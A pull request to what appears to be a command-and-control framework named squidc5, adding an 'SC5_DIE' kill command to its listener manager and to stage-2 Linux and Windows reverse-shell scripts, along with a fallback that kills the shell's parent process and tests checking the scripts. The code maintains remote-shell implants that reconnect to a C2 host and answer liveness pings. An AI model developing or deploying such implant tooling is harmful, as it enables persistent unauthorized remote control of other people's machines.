### PR TITLE
fix(shells): SC5_DIE so Kill stays dead

### DIFF
--- a/src/squidc5/listeners/manager.py
+++ b/src/squidc5/listeners/manager.py
@@ -828,10 +828,17 @@ class ListenerManager:
     async def kill_channel(self, session_id: str) -> None:
         """Ask the remote shell to exit, then drop TCP."""
         try:
-            await self.send_shell(session_id, "exit")
+            await self.send_shell(session_id, "SC5_DIE")
         except Exception:
             pass
-        await asyncio.sleep(0.12)
+        try:
+            await self.send_shell(
+                session_id,
+                "python3 -c 'import os,signal;os.kill(os.getppid(),9)'",
+            )
+        except Exception:
+            pass
+        await asyncio.sleep(0.2)
         await self.drop_channel(session_id)
 
     async def drop_channel(self, session_id: str) -> None:

--- a/src/squidc5/shells/stabilize.py
+++ b/src/squidc5/shells/stabilize.py
@@ -103,6 +103,8 @@ def _run_session(s):
             if not cmd:
                 continue
             # Built-in ping for C2 liveness probes
+            if cmd == "SC5_DIE":
+                os._exit(0)
             if cmd.startswith("SC5_PING "):
                 token = cmd.split(" ", 1)[1].strip()
                 try:
@@ -221,6 +223,7 @@ while ($true) {{
         if ($null -eq $cmd) {{ break }}
         $cmd = $cmd.Trim()
         if ($cmd -eq '') {{ continue }}
+        if ($cmd -eq 'SC5_DIE') {{ exit 0 }}
         if ($cmd.StartsWith('SC5_PING ')) {{
           $tok = $cmd.Substring(9).Trim()
           $w.WriteLine('SC5_PONG ' + $tok)

--- a/tests/test_shell_classify.py
+++ b/tests/test_shell_classify.py
@@ -45,6 +45,10 @@ def test_stabilizer_plans():
     assert linux.os_family == "linux"
     assert any("base64" in c or "python" in c for c in linux.commands)
     assert "SC5_PING" in __import__("squidc5.shells.stabilize", fromlist=["linux_stage2_script"]).linux_stage2_script("1.2.3.4", 443)
+    linux = __import__("squidc5.shells.stabilize", fromlist=["linux_stage2_script"]).linux_stage2_script("1.2.3.4", 443)
+    assert "SC5_DIE" in linux
+    from squidc5.shells.stabilize import windows_stage2_script
+    assert "SC5_DIE" in windows_stage2_script("1.2.3.4", 443)
     win = s.plan("windows")
     assert win.os_family == "windows"
     assert any("powershell" in c.lower() for c in win.commands)


### PR DESCRIPTION
Stage-2 reconnects after TCP close. Kill now sends SC5_DIE plus parent-kill fallback.